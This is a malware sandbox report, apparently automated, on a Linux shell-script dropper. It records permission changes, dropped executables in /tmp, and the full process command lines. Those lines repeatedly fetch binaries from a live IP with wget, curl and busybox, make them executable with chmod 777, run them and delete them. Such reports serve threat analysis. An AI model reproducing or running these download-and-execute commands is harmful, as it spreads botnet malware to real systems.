Analysis Overview
SHA256
891b558f4ebf530fc58f28f946e11062fdbc28d044f561b63c58ccaa11f5e738
Threat Level: Shows suspicious behavior
The file 03bce81f9ac0231f5c850a3fb1c16781.bin was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-21 01:00
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-21 01:00
Reported
2024-11-21 01:02
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
11s
Max time network
131s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN | /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN | N/A |
| N/A | /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e | /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e | N/A |
| N/A | /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc | /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc | N/A |
| N/A | /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ | /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ | N/A |
| N/A | /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy | /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy | N/A |
| N/A | /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc | /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc | N/A |
| N/A | /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx | /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx | N/A |
| N/A | /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH | /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH | N/A |
| N/A | /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 | /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 | N/A |
| N/A | /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk | /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk | N/A |
| N/A | /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO | /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO | N/A |
| N/A | /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV | /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV | N/A |
| N/A | /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi | /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi | N/A |
| N/A | /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM | /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM | N/A |
| N/A | /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV | /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV | N/A |
| N/A | /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi | /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi | N/A |
| N/A | /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM | /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM | N/A |
| N/A | /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO | /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO | N/A |
| N/A | /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN | /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN | N/A |
| N/A | /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e | /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e | N/A |
| N/A | /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc | /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc | N/A |
| N/A | /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ | /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ | N/A |
| N/A | /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy | /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy | N/A |
| N/A | /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH | /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH | N/A |
| N/A | /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 | /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 | N/A |
| N/A | /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk | /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk | N/A |
| N/A | /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc | /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc | N/A |
| N/A | /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx | /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e | /usr/bin/curl | N/A |
Processes
/tmp/59a56859b16d3d89334ed2d054cc2b5383bbb18ee44d9c24a8e963fcc747119d.sh
[/tmp/59a56859b16d3d89334ed2d054cc2b5383bbb18ee44d9c24a8e963fcc747119d.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/bin/chmod
[chmod 777 YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN
[./YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/bin/rm
[rm YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/usr/bin/wget
[wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/bin/chmod
[chmod 777 Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e
[./Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/bin/rm
[rm Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/usr/bin/wget
[wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/bin/chmod
[chmod 777 pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc
[./pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/bin/rm
[rm pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/usr/bin/wget
[wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/bin/chmod
[chmod 777 FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ
[./FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/bin/rm
[rm FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/usr/bin/wget
[wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/bin/chmod
[chmod 777 ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy
[./ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/bin/rm
[rm ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/usr/bin/wget
[wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/bin/chmod
[chmod 777 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc
[./1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/bin/rm
[rm 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/usr/bin/wget
[wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/bin/chmod
[chmod 777 VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx
[./VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/bin/rm
[rm VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/usr/bin/wget
[wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/bin/chmod
[chmod 777 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH
[./81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/bin/rm
[rm 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/usr/bin/wget
[wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/bin/chmod
[chmod 777 FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3
[./FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/bin/rm
[rm FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/usr/bin/wget
[wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/bin/chmod
[chmod 777 Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk
[./Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/bin/rm
[rm Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/usr/bin/wget
[wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/bin/chmod
[chmod 777 kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO
[./kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/bin/rm
[rm kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/usr/bin/wget
[wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/bin/chmod
[chmod 777 I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV
[./I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/bin/rm
[rm I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/usr/bin/wget
[wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/bin/chmod
[chmod 777 IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi
[./IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/bin/rm
[rm IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/usr/bin/wget
[wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/bin/chmod
[chmod 777 yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM
[./yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/bin/rm
[rm yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/usr/bin/wget
[wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/bin/chmod
[chmod 777 I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV
[./I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/bin/rm
[rm I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/usr/bin/wget
[wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/bin/chmod
[chmod 777 IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi
[./IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/bin/rm
[rm IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/usr/bin/wget
[wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/bin/chmod
[chmod 777 yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM
[./yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/bin/rm
[rm yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/usr/bin/wget
[wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/bin/chmod
[chmod 777 kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO
[./kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/bin/rm
[rm kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/usr/bin/wget
[wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/bin/chmod
[chmod 777 YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN
[./YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/bin/rm
[rm YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/usr/bin/wget
[wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/bin/chmod
[chmod 777 Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e
[./Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/bin/rm
[rm Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/usr/bin/wget
[wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/bin/chmod
[chmod 777 pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc
[./pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/bin/rm
[rm pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/usr/bin/wget
[wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/bin/chmod
[chmod 777 FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ
[./FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/bin/rm
[rm FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/usr/bin/wget
[wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/bin/chmod
[chmod 777 ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy
[./ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/bin/rm
[rm ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/usr/bin/wget
[wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/bin/chmod
[chmod 777 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH
[./81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/bin/rm
[rm 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/usr/bin/wget
[wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/bin/chmod
[chmod 777 FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3
[./FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/bin/rm
[rm FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/usr/bin/wget
[wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/bin/chmod
[chmod 777 Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk
[./Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/bin/rm
[rm Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/usr/bin/wget
[wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/bin/chmod
[chmod 777 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc
[./1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/bin/rm
[rm 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/usr/bin/wget
[wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/bin/busybox
